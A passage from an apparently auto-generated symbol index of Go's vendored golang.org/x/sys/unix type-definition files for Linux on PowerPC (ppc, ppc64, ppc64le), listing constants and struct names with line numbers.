CBitFieldMaskBit6 (line 352) | CBitFieldMaskBit6 = 0x40 constant CBitFieldMaskBit7 (line 353) | CBitFieldMaskBit7 = 0x80 constant CBitFieldMaskBit8 (line 354) | CBitFieldMaskBit8 = 0x100 constant CBitFieldMaskBit9 (line 355) | CBitFieldMaskBit9 = 0x200 constant CBitFieldMaskBit10 (line 356) | CBitFieldMaskBit10 = 0x400 constant CBitFieldMaskBit11 (line 357) | CBitFieldMaskBit11 = 0x800 constant CBitFieldMaskBit12 (line 358) | CBitFieldMaskBit12 = 0x1000 constant CBitFieldMaskBit13 (line 359) | CBitFieldMaskBit13 = 0x2000 constant CBitFieldMaskBit14 (line 360) | CBitFieldMaskBit14 = 0x4000 constant CBitFieldMaskBit15 (line 361) | CBitFieldMaskBit15 = 0x8000 constant CBitFieldMaskBit16 (line 362) | CBitFieldMaskBit16 = 0x10000 constant CBitFieldMaskBit17 (line 363) | CBitFieldMaskBit17 = 0x20000 constant CBitFieldMaskBit18 (line 364) | CBitFieldMaskBit18 = 0x40000 constant CBitFieldMaskBit19 (line 365) | CBitFieldMaskBit19 = 0x80000 constant CBitFieldMaskBit20 (line 366) | CBitFieldMaskBit20 = 0x100000 constant CBitFieldMaskBit21 (line 367) | CBitFieldMaskBit21 = 0x200000 constant CBitFieldMaskBit22 (line 368) | CBitFieldMaskBit22 = 0x400000 constant CBitFieldMaskBit23 (line 369) | CBitFieldMaskBit23 = 0x800000 constant CBitFieldMaskBit24 (line 370) | CBitFieldMaskBit24 = 0x1000000 constant CBitFieldMaskBit25 (line 371) | CBitFieldMaskBit25 = 0x2000000 constant CBitFieldMaskBit26 (line 372) | CBitFieldMaskBit26 = 0x4000000 constant CBitFieldMaskBit27 (line 373) | CBitFieldMaskBit27 = 0x8000000 constant CBitFieldMaskBit28 (line 374) | CBitFieldMaskBit28 = 0x10000000 constant CBitFieldMaskBit29 (line 375) | CBitFieldMaskBit29 = 0x20000000 constant CBitFieldMaskBit30 (line 376) | CBitFieldMaskBit30 = 0x40000000 constant CBitFieldMaskBit31 (line 377) | CBitFieldMaskBit31 = 0x80000000 constant CBitFieldMaskBit32 (line 378) | CBitFieldMaskBit32 = 0x100000000 constant CBitFieldMaskBit33 (line 379) | CBitFieldMaskBit33 = 0x200000000 constant CBitFieldMaskBit34 (line 380) | CBitFieldMaskBit34 = 0x400000000 constant CBitFieldMaskBit35 (line 381) | CBitFieldMaskBit35 = 0x800000000 constant CBitFieldMaskBit36 (line 382) | CBitFieldMaskBit36 = 0x1000000000 constant CBitFieldMaskBit37 (line 383) | CBitFieldMaskBit37 = 0x2000000000 constant CBitFieldMaskBit38 (line 384) | CBitFieldMaskBit38 = 0x4000000000 constant CBitFieldMaskBit39 (line 385) | CBitFieldMaskBit39 = 0x8000000000 constant CBitFieldMaskBit40 (line 386) | CBitFieldMaskBit40 = 0x10000000000 constant CBitFieldMaskBit41 (line 387) | CBitFieldMaskBit41 = 0x20000000000 constant CBitFieldMaskBit42 (line 388) | CBitFieldMaskBit42 = 0x40000000000 constant CBitFieldMaskBit43 (line 389) | CBitFieldMaskBit43 = 0x80000000000 constant CBitFieldMaskBit44 (line 390) | CBitFieldMaskBit44 = 0x100000000000 constant CBitFieldMaskBit45 (line 391) | CBitFieldMaskBit45 = 0x200000000000 constant CBitFieldMaskBit46 (line 392) | CBitFieldMaskBit46 = 0x400000000000 constant CBitFieldMaskBit47 (line 393) | CBitFieldMaskBit47 = 0x800000000000 constant CBitFieldMaskBit48 (line 394) | CBitFieldMaskBit48 = 0x1000000000000 constant CBitFieldMaskBit49 (line 395) | CBitFieldMaskBit49 = 0x2000000000000 constant CBitFieldMaskBit50 (line 396) | CBitFieldMaskBit50 = 0x4000000000000 constant CBitFieldMaskBit51 (line 397) | CBitFieldMaskBit51 = 0x8000000000000 constant CBitFieldMaskBit52 (line 398) | CBitFieldMaskBit52 = 0x10000000000000 constant CBitFieldMaskBit53 (line 399) | CBitFieldMaskBit53 = 0x20000000000000 constant CBitFieldMaskBit54 (line 400) | CBitFieldMaskBit54 = 0x40000000000000 constant CBitFieldMaskBit55 (line 401) | CBitFieldMaskBit55 = 0x80000000000000 constant CBitFieldMaskBit56 (line 402) | CBitFieldMaskBit56 = 0x100000000000000 constant CBitFieldMaskBit57 (line 403) | CBitFieldMaskBit57 = 0x200000000000000 constant CBitFieldMaskBit58 (line 404) | CBitFieldMaskBit58 = 0x400000000000000 constant CBitFieldMaskBit59 (line 405) | CBitFieldMaskBit59 = 0x800000000000000 constant CBitFieldMaskBit60 (line 406) | CBitFieldMaskBit60 = 0x1000000000000000 constant CBitFieldMaskBit61 (line 407) | CBitFieldMaskBit61 = 0x2000000000000000 constant CBitFieldMaskBit62 (line 408) | CBitFieldMaskBit62 = 0x4000000000000000 constant CBitFieldMaskBit63 (line 409) | CBitFieldMaskBit63 = 0x8000000000000000 type SockaddrStorage (line 412) | type SockaddrStorage struct type HDGeometry (line 418) | type HDGeometry struct type Statfs_t (line 425) | type Statfs_t struct type TpacketHdr (line 442) | type TpacketHdr struct constant SizeofTpacketHdr (line 453) | SizeofTpacketHdr = 0x18 type RTCPLLInfo (line 456) | type RTCPLLInfo struct type BlkpgPartition (line 466) | type BlkpgPartition struct constant BLKPG (line 476) | BLKPG = 0x20001269 type XDPUmemReg (line 479) | type XDPUmemReg struct type CryptoUserAlg (line 488) | type CryptoUserAlg struct type CryptoStatAEAD (line 498) | type CryptoStatAEAD struct type CryptoStatAKCipher (line 507) | type CryptoStatAKCipher struct type CryptoStatCipher (line 518) | type CryptoStatCipher struct type CryptoStatCompress (line 527) | type CryptoStatCompress struct type CryptoStatHash (line 536) | type CryptoStatHash struct type CryptoStatKPP (line 543) | type CryptoStatKPP struct type CryptoStatRNG (line 551) | type CryptoStatRNG struct type CryptoStatLarval (line 559) | type CryptoStatLarval struct type CryptoReportLarval (line 563) | type CryptoReportLarval struct type CryptoReportHash (line 567) | type CryptoReportHash struct type CryptoReportCipher (line 573) | type CryptoReportCipher struct type CryptoReportBlkCipher (line 580) | type CryptoReportBlkCipher struct type CryptoReportAEAD (line 589) | type CryptoReportAEAD struct type CryptoReportComp (line 597) | type CryptoReportComp struct type CryptoReportRNG (line 601) | type CryptoReportRNG struct type CryptoReportAKCipher (line 606) | type CryptoReportAKCipher struct type CryptoReportKPP (line 610) | type CryptoReportKPP struct type CryptoReportAcomp (line 614) | type CryptoReportAcomp struct type LoopInfo (line 618) | type LoopInfo struct type TIPCSubscr (line 633) | type TIPCSubscr struct type TIPCSIOCLNReq (line 640) | type TIPCSIOCLNReq struct type TIPCSIOCNodeIDReq (line 646) | type TIPCSIOCNodeIDReq struct type PPSKInfo (line 651) | type PPSKInfo struct constant PPS_GETPARAMS (line 661) | PPS_GETPARAMS = 0x400470a1 constant PPS_SETPARAMS (line 662) | PPS_SETPARAMS = 0x800470a2 constant PPS_GETCAP (line 663) | PPS_GETCAP = 0x400470a3 constant PPS_FETCH (line 664) | PPS_FETCH = 0xc00470a4 constant PIDFD_NONBLOCK (line 668) | PIDFD_NONBLOCK = 0x80 type SysvIpcPerm (line 671) | type SysvIpcPerm struct type SysvShmDesc (line 684) | type SysvShmDesc struct FILE: vendor/golang.org/x/sys/unix/ztypes_linux_ppc.go constant SizeofPtr (line 9) | SizeofPtr = 0x4 constant SizeofLong (line 10) | SizeofLong = 0x4 type _C_long (line 14) | type _C_long type Timespec (line 17) | type Timespec struct type Timeval (line 22) | type Timeval struct type Timex (line 27) | type Timex struct type Time_t (line 51) | type Time_t type Tms (line 53) | type Tms struct type Utimbuf (line 60) | type Utimbuf struct type Rusage (line 65) | type Rusage struct type Stat_t (line 84) | type Stat_t struct type Dirent (line 105) | type Dirent struct type Flock_t (line 114) | type Flock_t struct type DmNameList (line 124) | type DmNameList struct constant FADV_DONTNEED (line 132) | FADV_DONTNEED = 0x4 constant FADV_NOREUSE (line 133) | FADV_NOREUSE = 0x5 type RawSockaddrNFCLLCP (line 136) | type RawSockaddrNFCLLCP struct type RawSockaddr (line 147) | type RawSockaddr struct type RawSockaddrAny (line 152) | type RawSockaddrAny struct type Iovec (line 157) | type Iovec struct type Msghdr (line 162) | type Msghdr struct type Cmsghdr (line 172) | type Cmsghdr struct type ifreq (line 178) | type ifreq struct constant SizeofSockaddrNFCLLCP (line 184) | SizeofSockaddrNFCLLCP = 0x58 constant SizeofIovec (line 185) | SizeofIovec = 0x8 constant SizeofMsghdr (line 186) | SizeofMsghdr = 0x1c constant SizeofCmsghdr (line 187) | SizeofCmsghdr = 0xc constant SizeofSockFprog (line 191) | SizeofSockFprog = 0x8 type PtraceRegs (line 194) | type PtraceRegs struct type FdSet (line 210) | type FdSet struct type Sysinfo_t (line 214) | type Sysinfo_t struct type Ustat_t (line 231) | type Ustat_t struct type EpollEvent (line 238) | type EpollEvent struct constant OPEN_TREE_CLOEXEC (line 246) | OPEN_TREE_CLOEXEC = 0x80000 constant POLLRDHUP (line 250) | POLLRDHUP = 0x2000 type Sigset_t (line 253) | type Sigset_t struct constant _C__NSIG (line 257) | _C__NSIG = 0x41 constant SIG_BLOCK (line 260) | SIG_BLOCK = 0x0 constant SIG_UNBLOCK (line 261) | SIG_UNBLOCK = 0x1 constant SIG_SETMASK (line 262) | SIG_SETMASK = 0x2 type Siginfo (line 265) | type Siginfo struct type Termios (line 272) | type Termios struct type Taskstats (line 283) | type Taskstats struct type cpuMask (line 346) | type cpuMask constant _NCPUBITS (line 349) | _NCPUBITS = 0x20 constant CBitFieldMaskBit0 (line 353) | CBitFieldMaskBit0 = 0x8000000000000000 constant CBitFieldMaskBit1 (line 354) | CBitFieldMaskBit1 = 0x4000000000000000 constant CBitFieldMaskBit2 (line 355) | CBitFieldMaskBit2 = 0x2000000000000000 constant CBitFieldMaskBit3 (line 356) | CBitFieldMaskBit3 = 0x1000000000000000 constant CBitFieldMaskBit4 (line 357) | CBitFieldMaskBit4 = 0x800000000000000 constant CBitFieldMaskBit5 (line 358) | CBitFieldMaskBit5 = 0x400000000000000 constant CBitFieldMaskBit6 (line 359) | CBitFieldMaskBit6 = 0x200000000000000 constant CBitFieldMaskBit7 (line 360) | CBitFieldMaskBit7 = 0x100000000000000 constant CBitFieldMaskBit8 (line 361) | CBitFieldMaskBit8 = 0x80000000000000 constant CBitFieldMaskBit9 (line 362) | CBitFieldMaskBit9 = 0x40000000000000 constant CBitFieldMaskBit10 (line 363) | CBitFieldMaskBit10 = 0x20000000000000 constant CBitFieldMaskBit11 (line 364) | CBitFieldMaskBit11 = 0x10000000000000 constant CBitFieldMaskBit12 (line 365) | CBitFieldMaskBit12 = 0x8000000000000 constant CBitFieldMaskBit13 (line 366) | CBitFieldMaskBit13 = 0x4000000000000 constant CBitFieldMaskBit14 (line 367) | CBitFieldMaskBit14 = 0x2000000000000 constant CBitFieldMaskBit15 (line 368) | CBitFieldMaskBit15 = 0x1000000000000 constant CBitFieldMaskBit16 (line 369) | CBitFieldMaskBit16 = 0x800000000000 constant CBitFieldMaskBit17 (line 370) | CBitFieldMaskBit17 = 0x400000000000 constant CBitFieldMaskBit18 (line 371) | CBitFieldMaskBit18 = 0x200000000000 constant CBitFieldMaskBit19 (line 372) | CBitFieldMaskBit19 = 0x100000000000 constant CBitFieldMaskBit20 (line 373) | CBitFieldMaskBit20 = 0x80000000000 constant CBitFieldMaskBit21 (line 374) | CBitFieldMaskBit21 = 0x40000000000 constant CBitFieldMaskBit22 (line 375) | CBitFieldMaskBit22 = 0x20000000000 constant CBitFieldMaskBit23 (line 376) | CBitFieldMaskBit23 = 0x10000000000 constant CBitFieldMaskBit24 (line 377) | CBitFieldMaskBit24 = 0x8000000000 constant CBitFieldMaskBit25 (line 378) | CBitFieldMaskBit25 = 0x4000000000 constant CBitFieldMaskBit26 (line 379) | CBitFieldMaskBit26 = 0x2000000000 constant CBitFieldMaskBit27 (line 380) | CBitFieldMaskBit27 = 0x1000000000 constant CBitFieldMaskBit28 (line 381) | CBitFieldMaskBit28 = 0x800000000 constant CBitFieldMaskBit29 (line 382) | CBitFieldMaskBit29 = 0x400000000 constant CBitFieldMaskBit30 (line 383) | CBitFieldMaskBit30 = 0x200000000 constant CBitFieldMaskBit31 (line 384) | CBitFieldMaskBit31 = 0x100000000 constant CBitFieldMaskBit32 (line 385) | CBitFieldMaskBit32 = 0x80000000 constant CBitFieldMaskBit33 (line 386) | CBitFieldMaskBit33 = 0x40000000 constant CBitFieldMaskBit34 (line 387) | CBitFieldMaskBit34 = 0x20000000 constant CBitFieldMaskBit35 (line 388) | CBitFieldMaskBit35 = 0x10000000 constant CBitFieldMaskBit36 (line 389) | CBitFieldMaskBit36 = 0x8000000 constant CBitFieldMaskBit37 (line 390) | CBitFieldMaskBit37 = 0x4000000 constant CBitFieldMaskBit38 (line 391) | CBitFieldMaskBit38 = 0x2000000 constant CBitFieldMaskBit39 (line 392) | CBitFieldMaskBit39 = 0x1000000 constant CBitFieldMaskBit40 (line 393) | CBitFieldMaskBit40 = 0x800000 constant CBitFieldMaskBit41 (line 394) | CBitFieldMaskBit41 = 0x400000 constant CBitFieldMaskBit42 (line 395) | CBitFieldMaskBit42 = 0x200000 constant CBitFieldMaskBit43 (line 396) | CBitFieldMaskBit43 = 0x100000 constant CBitFieldMaskBit44 (line 397) | CBitFieldMaskBit44 = 0x80000 constant CBitFieldMaskBit45 (line 398) | CBitFieldMaskBit45 = 0x40000 constant CBitFieldMaskBit46 (line 399) | CBitFieldMaskBit46 = 0x20000 constant CBitFieldMaskBit47 (line 400) | CBitFieldMaskBit47 = 0x10000 constant CBitFieldMaskBit48 (line 401) | CBitFieldMaskBit48 = 0x8000 constant CBitFieldMaskBit49 (line 402) | CBitFieldMaskBit49 = 0x4000 constant CBitFieldMaskBit50 (line 403) | CBitFieldMaskBit50 = 0x2000 constant CBitFieldMaskBit51 (line 404) | CBitFieldMaskBit51 = 0x1000 constant CBitFieldMaskBit52 (line 405) | CBitFieldMaskBit52 = 0x800 constant CBitFieldMaskBit53 (line 406) | CBitFieldMaskBit53 = 0x400 constant CBitFieldMaskBit54 (line 407) | CBitFieldMaskBit54 = 0x200 constant CBitFieldMaskBit55 (line 408) | CBitFieldMaskBit55 = 0x100 constant CBitFieldMaskBit56 (line 409) | CBitFieldMaskBit56 = 0x80 constant CBitFieldMaskBit57 (line 410) | CBitFieldMaskBit57 = 0x40 constant CBitFieldMaskBit58 (line 411) | CBitFieldMaskBit58 = 0x20 constant CBitFieldMaskBit59 (line 412) | CBitFieldMaskBit59 = 0x10 constant CBitFieldMaskBit60 (line 413) | CBitFieldMaskBit60 = 0x8 constant CBitFieldMaskBit61 (line 414) | CBitFieldMaskBit61 = 0x4 constant CBitFieldMaskBit62 (line 415) | CBitFieldMaskBit62 = 0x2 constant CBitFieldMaskBit63 (line 416) | CBitFieldMaskBit63 = 0x1 type SockaddrStorage (line 419) | type SockaddrStorage struct type HDGeometry (line 425) | type HDGeometry struct type Statfs_t (line 432) | type Statfs_t struct type TpacketHdr (line 448) | type TpacketHdr struct constant SizeofTpacketHdr (line 459) | SizeofTpacketHdr = 0x18 type RTCPLLInfo (line 462) | type RTCPLLInfo struct type BlkpgPartition (line 472) | type BlkpgPartition struct constant BLKPG (line 482) | BLKPG = 0x20001269 type XDPUmemReg (line 485) | type XDPUmemReg struct type CryptoUserAlg (line 494) | type CryptoUserAlg struct type CryptoStatAEAD (line 504) | type CryptoStatAEAD struct type CryptoStatAKCipher (line 513) | type CryptoStatAKCipher struct type CryptoStatCipher (line 524) | type CryptoStatCipher struct type CryptoStatCompress (line 533) | type CryptoStatCompress struct type CryptoStatHash (line 542) | type CryptoStatHash struct type CryptoStatKPP (line 549) | type CryptoStatKPP struct type CryptoStatRNG (line 557) | type CryptoStatRNG struct type CryptoStatLarval (line 565) | type CryptoStatLarval struct type CryptoReportLarval (line 569) | type CryptoReportLarval struct type CryptoReportHash (line 573) | type CryptoReportHash struct type CryptoReportCipher (line 579) | type CryptoReportCipher struct type CryptoReportBlkCipher (line 586) | type CryptoReportBlkCipher struct type CryptoReportAEAD (line 595) | type CryptoReportAEAD struct type CryptoReportComp (line 603) | type CryptoReportComp struct type CryptoReportRNG (line 607) | type CryptoReportRNG struct type CryptoReportAKCipher (line 612) | type CryptoReportAKCipher struct type CryptoReportKPP (line 616) | type CryptoReportKPP struct type CryptoReportAcomp (line 620) | type CryptoReportAcomp struct type LoopInfo (line 624) | type LoopInfo struct type TIPCSubscr (line 639) | type TIPCSubscr struct type TIPCSIOCLNReq (line 646) | type TIPCSIOCLNReq struct type TIPCSIOCNodeIDReq (line 652) | type TIPCSIOCNodeIDReq struct type PPSKInfo (line 657) | type PPSKInfo struct constant PPS_GETPARAMS (line 667) | PPS_GETPARAMS = 0x400470a1 constant PPS_SETPARAMS (line 668) | PPS_SETPARAMS = 0x800470a2 constant PPS_GETCAP (line 669) | PPS_GETCAP = 0x400470a3 constant PPS_FETCH (line 670) | PPS_FETCH = 0xc00470a4 constant PIDFD_NONBLOCK (line 674) | PIDFD_NONBLOCK = 0x800 type SysvIpcPerm (line 677) | type SysvIpcPerm struct type SysvShmDesc (line 689) | type SysvShmDesc struct FILE: vendor/golang.org/x/sys/unix/ztypes_linux_ppc64.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofLong (line 10) | SizeofLong = 0x8 type _C_long (line 14) | type _C_long type Timespec (line 17) | type Timespec struct type Timeval (line 22) | type Timeval struct type Timex (line 27) | type Timex struct type Time_t (line 51) | type Time_t type Tms (line 53) | type Tms struct type Utimbuf (line 60) | type Utimbuf struct type Rusage (line 65) | type Rusage struct type Stat_t (line 84) | type Stat_t struct type Dirent (line 104) | type Dirent struct type Flock_t (line 113) | type Flock_t struct type DmNameList (line 122) | type DmNameList struct constant FADV_DONTNEED (line 130) | FADV_DONTNEED = 0x4 constant FADV_NOREUSE (line 131) | FADV_NOREUSE = 0x5 type RawSockaddrNFCLLCP (line 134) | type RawSockaddrNFCLLCP struct type RawSockaddr (line 145) | type RawSockaddr struct type RawSockaddrAny (line 150) | type RawSockaddrAny struct type Iovec (line 155) | type Iovec struct type Msghdr (line 160) | type Msghdr struct type Cmsghdr (line 171) | type Cmsghdr struct type ifreq (line 177) | type ifreq struct constant SizeofSockaddrNFCLLCP (line 183) | SizeofSockaddrNFCLLCP = 0x60 constant SizeofIovec (line 184) | SizeofIovec = 0x10 constant SizeofMsghdr (line 185) | SizeofMsghdr = 0x38 constant SizeofCmsghdr (line 186) | SizeofCmsghdr = 0x10 constant SizeofSockFprog (line 190) | SizeofSockFprog = 0x10 type PtraceRegs (line 193) | type PtraceRegs struct type FdSet (line 209) | type FdSet struct type Sysinfo_t (line 213) | type Sysinfo_t struct type Ustat_t (line 231) | type Ustat_t struct type EpollEvent (line 239) | type EpollEvent struct constant OPEN_TREE_CLOEXEC (line 247) | OPEN_TREE_CLOEXEC = 0x80000 constant POLLRDHUP (line 251) | POLLRDHUP = 0x2000 type Sigset_t (line 254) | type Sigset_t struct constant _C__NSIG (line 258) | _C__NSIG = 0x41 constant SIG_BLOCK (line 261) | SIG_BLOCK = 0x0 constant SIG_UNBLOCK (line 262) | SIG_UNBLOCK = 0x1 constant SIG_SETMASK (line 263) | SIG_SETMASK = 0x2 type Siginfo (line 266) | type Siginfo struct type Termios (line 274) | type Termios struct type Taskstats (line 285) | type Taskstats struct type cpuMask (line 345) | type cpuMask constant _NCPUBITS (line 348) | _NCPUBITS = 0x40 constant CBitFieldMaskBit0 (line 352) | CBitFieldMaskBit0 = 0x8000000000000000 constant CBitFieldMaskBit1 (line 353) | CBitFieldMaskBit1 = 0x4000000000000000 constant CBitFieldMaskBit2 (line 354) | CBitFieldMaskBit2 = 0x2000000000000000 constant CBitFieldMaskBit3 (line 355) | CBitFieldMaskBit3 = 0x1000000000000000 constant CBitFieldMaskBit4 (line 356) | CBitFieldMaskBit4 = 0x800000000000000 constant CBitFieldMaskBit5 (line 357) | CBitFieldMaskBit5 = 0x400000000000000 constant CBitFieldMaskBit6 (line 358) | CBitFieldMaskBit6 = 0x200000000000000 constant CBitFieldMaskBit7 (line 359) | CBitFieldMaskBit7 = 0x100000000000000 constant CBitFieldMaskBit8 (line 360) | CBitFieldMaskBit8 = 0x80000000000000 constant CBitFieldMaskBit9 (line 361) | CBitFieldMaskBit9 = 0x40000000000000 constant CBitFieldMaskBit10 (line 362) | CBitFieldMaskBit10 = 0x20000000000000 constant CBitFieldMaskBit11 (line 363) | CBitFieldMaskBit11 = 0x10000000000000 constant CBitFieldMaskBit12 (line 364) | CBitFieldMaskBit12 = 0x8000000000000 constant CBitFieldMaskBit13 (line 365) | CBitFieldMaskBit13 = 0x4000000000000 constant CBitFieldMaskBit14 (line 366) | CBitFieldMaskBit14 = 0x2000000000000 constant CBitFieldMaskBit15 (line 367) | CBitFieldMaskBit15 = 0x1000000000000 constant CBitFieldMaskBit16 (line 368) | CBitFieldMaskBit16 = 0x800000000000 constant CBitFieldMaskBit17 (line 369) | CBitFieldMaskBit17 = 0x400000000000 constant CBitFieldMaskBit18 (line 370) | CBitFieldMaskBit18 = 0x200000000000 constant CBitFieldMaskBit19 (line 371) | CBitFieldMaskBit19 = 0x100000000000 constant CBitFieldMaskBit20 (line 372) | CBitFieldMaskBit20 = 0x80000000000 constant CBitFieldMaskBit21 (line 373) | CBitFieldMaskBit21 = 0x40000000000 constant CBitFieldMaskBit22 (line 374) | CBitFieldMaskBit22 = 0x20000000000 constant CBitFieldMaskBit23 (line 375) | CBitFieldMaskBit23 = 0x10000000000 constant CBitFieldMaskBit24 (line 376) | CBitFieldMaskBit24 = 0x8000000000 constant CBitFieldMaskBit25 (line 377) | CBitFieldMaskBit25 = 0x4000000000 constant CBitFieldMaskBit26 (line 378) | CBitFieldMaskBit26 = 0x2000000000 constant CBitFieldMaskBit27 (line 379) | CBitFieldMaskBit27 = 0x1000000000 constant CBitFieldMaskBit28 (line 380) | CBitFieldMaskBit28 = 0x800000000 constant CBitFieldMaskBit29 (line 381) | CBitFieldMaskBit29 = 0x400000000 constant CBitFieldMaskBit30 (line 382) | CBitFieldMaskBit30 = 0x200000000 constant CBitFieldMaskBit31 (line 383) | CBitFieldMaskBit31 = 0x100000000 constant CBitFieldMaskBit32 (line 384) | CBitFieldMaskBit32 = 0x80000000 constant CBitFieldMaskBit33 (line 385) | CBitFieldMaskBit33 = 0x40000000 constant CBitFieldMaskBit34 (line 386) | CBitFieldMaskBit34 = 0x20000000 constant CBitFieldMaskBit35 (line 387) | CBitFieldMaskBit35 = 0x10000000 constant CBitFieldMaskBit36 (line 388) | CBitFieldMaskBit36 = 0x8000000 constant CBitFieldMaskBit37 (line 389) | CBitFieldMaskBit37 = 0x4000000 constant CBitFieldMaskBit38 (line 390) | CBitFieldMaskBit38 = 0x2000000 constant CBitFieldMaskBit39 (line 391) | CBitFieldMaskBit39 = 0x1000000 constant CBitFieldMaskBit40 (line 392) | CBitFieldMaskBit40 = 0x800000 constant CBitFieldMaskBit41 (line 393) | CBitFieldMaskBit41 = 0x400000 constant CBitFieldMaskBit42 (line 394) | CBitFieldMaskBit42 = 0x200000 constant CBitFieldMaskBit43 (line 395) | CBitFieldMaskBit43 = 0x100000 constant CBitFieldMaskBit44 (line 396) | CBitFieldMaskBit44 = 0x80000 constant CBitFieldMaskBit45 (line 397) | CBitFieldMaskBit45 = 0x40000 constant CBitFieldMaskBit46 (line 398) | CBitFieldMaskBit46 = 0x20000 constant CBitFieldMaskBit47 (line 399) | CBitFieldMaskBit47 = 0x10000 constant CBitFieldMaskBit48 (line 400) | CBitFieldMaskBit48 = 0x8000 constant CBitFieldMaskBit49 (line 401) | CBitFieldMaskBit49 = 0x4000 constant CBitFieldMaskBit50 (line 402) | CBitFieldMaskBit50 = 0x2000 constant CBitFieldMaskBit51 (line 403) | CBitFieldMaskBit51 = 0x1000 constant CBitFieldMaskBit52 (line 404) | CBitFieldMaskBit52 = 0x800 constant CBitFieldMaskBit53 (line 405) | CBitFieldMaskBit53 = 0x400 constant CBitFieldMaskBit54 (line 406) | CBitFieldMaskBit54 = 0x200 constant CBitFieldMaskBit55 (line 407) | CBitFieldMaskBit55 = 0x100 constant CBitFieldMaskBit56 (line 408) | CBitFieldMaskBit56 = 0x80 constant CBitFieldMaskBit57 (line 409) | CBitFieldMaskBit57 = 0x40 constant CBitFieldMaskBit58 (line 410) | CBitFieldMaskBit58 = 0x20 constant CBitFieldMaskBit59 (line 411) | CBitFieldMaskBit59 = 0x10 constant CBitFieldMaskBit60 (line 412) | CBitFieldMaskBit60 = 0x8 constant CBitFieldMaskBit61 (line 413) | CBitFieldMaskBit61 = 0x4 constant CBitFieldMaskBit62 (line 414) | CBitFieldMaskBit62 = 0x2 constant CBitFieldMaskBit63 (line 415) | CBitFieldMaskBit63 = 0x1 type SockaddrStorage (line 418) | type SockaddrStorage struct type HDGeometry (line 424) | type HDGeometry struct type Statfs_t (line 431) | type Statfs_t struct type TpacketHdr (line 446) | type TpacketHdr struct constant SizeofTpacketHdr (line 458) | SizeofTpacketHdr = 0x20 type RTCPLLInfo (line 461) | type RTCPLLInfo struct type BlkpgPartition (line 471) | type BlkpgPartition struct constant BLKPG (line 481) | BLKPG = 0x20001269 type XDPUmemReg (line 484) | type XDPUmemReg struct type CryptoUserAlg (line 493) | type CryptoUserAlg struct type CryptoStatAEAD (line 503) | type CryptoStatAEAD struct type CryptoStatAKCipher (line 512) | type CryptoStatAKCipher struct type CryptoStatCipher (line 523) | type CryptoStatCipher struct type CryptoStatCompress (line 532) | type CryptoStatCompress struct type CryptoStatHash (line 541) | type CryptoStatHash struct type CryptoStatKPP (line 548) | type CryptoStatKPP struct type CryptoStatRNG (line 556) | type CryptoStatRNG struct type CryptoStatLarval (line 564) | type CryptoStatLarval struct type CryptoReportLarval (line 568) | type CryptoReportLarval struct type CryptoReportHash (line 572) | type CryptoReportHash struct type CryptoReportCipher (line 578) | type CryptoReportCipher struct type CryptoReportBlkCipher (line 585) | type CryptoReportBlkCipher struct type CryptoReportAEAD (line 594) | type CryptoReportAEAD struct type CryptoReportComp (line 602) | type CryptoReportComp struct type CryptoReportRNG (line 606) | type CryptoReportRNG struct type CryptoReportAKCipher (line 611) | type CryptoReportAKCipher struct type CryptoReportKPP (line 615) | type CryptoReportKPP struct type CryptoReportAcomp (line 619) | type CryptoReportAcomp struct type LoopInfo (line 623) | type LoopInfo struct type TIPCSubscr (line 639) | type TIPCSubscr struct type TIPCSIOCLNReq (line 646) | type TIPCSIOCLNReq struct type TIPCSIOCNodeIDReq (line 652) | type TIPCSIOCNodeIDReq struct type PPSKInfo (line 657) | type PPSKInfo struct constant PPS_GETPARAMS (line 667) | PPS_GETPARAMS = 0x400870a1 constant PPS_SETPARAMS (line 668) | PPS_SETPARAMS = 0x800870a2 constant PPS_GETCAP (line 669) | PPS_GETCAP = 0x400870a3 constant PPS_FETCH (line 670) | PPS_FETCH = 0xc00870a4 constant PIDFD_NONBLOCK (line 674) | PIDFD_NONBLOCK = 0x800 type SysvIpcPerm (line 677) | type SysvIpcPerm struct type SysvShmDesc (line 689) | type SysvShmDesc struct FILE: vendor/golang.org/x/sys/unix/ztypes_linux_ppc64le.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofLong (line 10) | SizeofLong = 0x8 type _C_long (line 14) | type _C_long type Timespec (line 17) | type Timespec struct type Timeval (line 22) | type Timeval struct type Timex (line 27) | type Timex struct type Time_t (line 51) | type Time_t type Tms (line 53) | type Tms struct type Utimbuf (line 60) | type Utimbuf struct type Rusage (line 65) | type Rusage struct type Stat_t (line 84) | type Stat_t struct type Dirent (line 104) | type Dirent struct type Flock_t (line 113) | type Flock_t struct type DmNameList (line 122) | type DmNameList struct constant FADV_DONTNEED (line 130) | FADV_DONTNEED = 0x4 constant FADV_NOREUSE (line 131) | FADV_NOREUSE = 0x5 type RawSockaddrNFCLLCP (line 134) | type RawSockaddrNFCLLCP struct type RawSockaddr (line 145) | type RawSockaddr struct type RawSockaddrAny (line 150) | type RawSockaddrAny struct type Iovec (line 155) | type Iovec struct type Msghdr (line 160) | type Msghdr struct type Cmsghdr (line 171) | type Cmsghdr struct type ifreq (line 177) | type ifreq struct constant SizeofSockaddrNFCLLCP (line 183) | SizeofSockaddrNFCLLCP = 0x60 constant SizeofIovec (line 184) | SizeofIovec = 0x10 constant SizeofMsghdr (line 185) | SizeofMsghdr = 0x38 constant SizeofCmsghdr (line 186) | SizeofCmsghdr = 0x10 constant SizeofSockFprog (line 190) | SizeofSockFprog = 0x10 type PtraceRegs (line 193) | type PtraceRegs struct type FdSet (line 209) | type FdSet struct type Sysinfo_t (line 213) | type Sysinfo_t struct type Ustat_t (line 231) | type Ustat_t struct type EpollEvent (line 239) | type EpollEvent struct constant OPEN_TREE_CLOEXEC (line 247) | OPEN_TREE_CLOEXEC = 0x80000 constant POLLRDHUP (line 251) | POLLRDHUP = 0x2000 type Sigset_t (line 254) | type Sigset_t struct constant _C__NSIG (line 258) | _C__NSIG = 0x41 constant SIG_BLOCK (line 261) | SIG_BLOCK = 0x0 constant SIG_UNBLOCK (line 262) | SIG_UNBLOCK = 0x1 constant SIG_SETMASK (line 263) | SIG_SETMASK = 0x2 type Siginfo (line 266) | type Siginfo struct type Termios (line 274) | type Termios struct type Taskstats (line 285) | type Taskstats struct type cpuMask (line 345) | type cpuMask constant _NCPUBITS (line 348) | _NCPUBITS = 0x40 constant CBitFieldMaskBit0 (line 352) | CBitFieldMaskBit0 = 0x1 constant CBitFieldMaskBit1 (line 353) | CBitFieldMaskBit1 = 0x2 constant CBitFieldMaskBit2 (line 354) | CBitFieldMaskBit2 = 0x4 constant CBitFieldMaskBit3 (line 355) | 